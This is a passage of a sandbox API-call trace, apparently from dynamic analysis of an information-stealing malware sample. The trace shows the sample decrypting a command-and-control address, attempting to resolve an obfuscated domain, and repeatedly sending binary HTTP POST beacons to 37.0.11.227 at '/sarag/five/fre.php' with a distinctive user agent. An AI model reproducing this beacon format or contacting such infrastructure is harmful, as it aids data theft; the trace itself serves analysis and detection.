ai_next=0x0)) [0274.165] GetProcessHeap () returned 0x690000 [0274.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0274.165] GetProcessHeap () returned 0x690000 [0274.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0274.166] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.167] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.167] GetProcessHeap () returned 0x690000 [0274.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0274.167] GetProcessHeap () returned 0x690000 [0274.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.168] GetProcessHeap () returned 0x690000 [0274.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0274.168] GetProcessHeap () returned 0x690000 [0274.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0274.169] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.170] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.170] GetProcessHeap () returned 0x690000 [0274.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0274.170] GetProcessHeap () returned 0x690000 [0274.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.170] send (s=0x848, buf=0x6ad508*, len=242, flags=0) returned 242 [0274.171] send (s=0x848, buf=0x6aba40*, len=159, flags=0) returned 159 [0274.171] GetProcessHeap () returned 0x690000 [0274.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0274.171] recv (in: s=0x848, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0274.249] GetProcessHeap () returned 0x690000 [0274.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0274.253] GetProcessHeap () returned 0x690000 [0274.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0274.253] GetProcessHeap () returned 0x690000 [0274.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0274.254] GetProcessHeap () returned 0x690000 [0274.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0274.254] closesocket (s=0x848) returned 0 [0274.255] GetProcessHeap () returned 0x690000 [0274.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0274.255] GetProcessHeap () returned 0x690000 [0274.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.255] GetProcessHeap () returned 0x690000 [0274.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0274.256] GetProcessHeap () returned 0x690000 [0274.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0274.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1600) returned 0x848 [0274.258] Sleep (dwMilliseconds=0xea60) [0274.260] GetProcessHeap () returned 0x690000 [0274.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0274.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.270] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0274.276] GetProcessHeap () returned 0x690000 [0274.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0274.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.278] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0274.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.279] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.318] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.319] GetProcessHeap () returned 0x690000 [0274.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0274.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.330] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0274.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.331] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0274.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.332] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0274.332] GetProcessHeap () returned 0x690000 [0274.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0274.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.333] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.334] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.335] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.339] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.339] GetProcessHeap () returned 0x690000 [0274.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0274.357] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0274.358] GetProcessHeap () returned 0x690000 [0274.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0274.358] GetProcessHeap () returned 0x690000 [0274.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.359] GetProcessHeap () returned 0x690000 [0274.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0274.359] GetProcessHeap () returned 0x690000 [0274.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0274.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.360] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.369] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0274.376] GetProcessHeap () returned 0x690000 [0274.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0274.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.378] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0274.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.379] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.380] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.380] GetProcessHeap () returned 0x690000 [0274.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0274.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.382] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0274.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.383] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0274.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.384] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0274.384] GetProcessHeap () returned 0x690000 [0274.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0274.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.385] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0274.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.387] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0274.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.388] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0274.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.391] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0274.391] GetProcessHeap () returned 0x690000 [0274.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0274.392] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0274.392] GetProcessHeap () returned 0x690000 [0274.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0274.392] socket (af=2, type=1, protocol=6) returned 0x84c [0274.392] connect (s=0x84c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0274.416] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0274.416] GetProcessHeap () returned 0x690000 [0274.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0274.417] GetProcessHeap () returned 0x690000 [0274.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0274.417] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.418] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.418] GetProcessHeap () returned 0x690000 [0274.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0274.419] GetProcessHeap () returned 0x690000 [0274.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.419] GetProcessHeap () returned 0x690000 [0274.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0274.419] GetProcessHeap () returned 0x690000 [0274.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0274.420] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.421] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.421] GetProcessHeap () returned 0x690000 [0274.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0274.421] GetProcessHeap () returned 0x690000 [0274.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.422] send (s=0x84c, buf=0x6ad508*, len=242, flags=0) returned 242 [0274.423] send (s=0x84c, buf=0x6aba40*, len=159, flags=0) returned 159 [0274.423] GetProcessHeap () returned 0x690000 [0274.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0274.423] recv (in: s=0x84c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0274.517] GetProcessHeap () returned 0x690000 [0274.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0274.517] GetProcessHeap () returned 0x690000 [0274.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0274.518] GetProcessHeap () returned 0x690000 [0274.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0274.518] GetProcessHeap () returned 0x690000 [0274.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0274.518] closesocket (s=0x84c) returned 0 [0274.519] GetProcessHeap () returned 0x690000 [0274.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0274.519] GetProcessHeap () returned 0x690000 [0274.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0274.519] GetProcessHeap () returned 0x690000 [0274.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0274.520] GetProcessHeap () returned 0x690000 [0274.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0274.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1604) returned 0x84c [0274.522] Sleep (dwMilliseconds=0xea60) [0274.528] GetProcessHeap () returned 0x690000 [0274.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0274.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.529] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.535] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0274.549] GetProcessHeap () returned 0x690000 [0274.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0274.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.551] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0274.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.553] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.554] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.554] GetProcessHeap () returned 0x690000 [0274.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0274.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.556] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0274.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.557] CryptDestroyKey (hKey=0x69d628) returned 1 [0274.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.558] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0274.558] GetProcessHeap () returned 0x690000 [0274.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0274.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.564] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.565] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.566] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.568] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.568] GetProcessHeap () returned 0x690000 [0274.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0274.568] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0274.568] GetProcessHeap () returned 0x690000 [0274.569] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0274.571] GetProcessHeap () returned 0x690000 [0274.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0274.571] GetProcessHeap () returned 0x690000 [0274.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0274.572] GetProcessHeap () returned 0x690000 [0274.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0274.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.573] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.579] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0274.588] GetProcessHeap () returned 0x690000 [0274.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0274.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.590] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0274.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.594] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.595] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.595] GetProcessHeap () returned 0x690000 [0274.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0274.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.597] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0274.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.598] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0274.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0274.599] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0274.599] GetProcessHeap () returned 0x690000 [0274.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0274.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.600] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0274.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.601] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0274.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.602] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0274.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0274.603] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0274.604] GetProcessHeap () returned 0x690000 [0274.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0274.604] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0274.604] GetProcessHeap () returned 0x690000 [0274.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0274.604] socket (af=2, type=1, protocol=6) returned 0x850 [0274.604] connect (s=0x850, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0274.632] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0274.632] GetProcessHeap () returned 0x690000 [0274.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0274.632] GetProcessHeap () returned 0x690000 [0274.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0274.633] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0274.634] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.634] GetProcessHeap () returned 0x690000 [0274.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0274.634] GetProcessHeap () returned 0x690000 [0274.634] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0274.634] GetProcessHeap () returned 0x690000 [0274.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0274.637] GetProcessHeap () returned 0x690000 [0274.637] RtlAllocateHeap 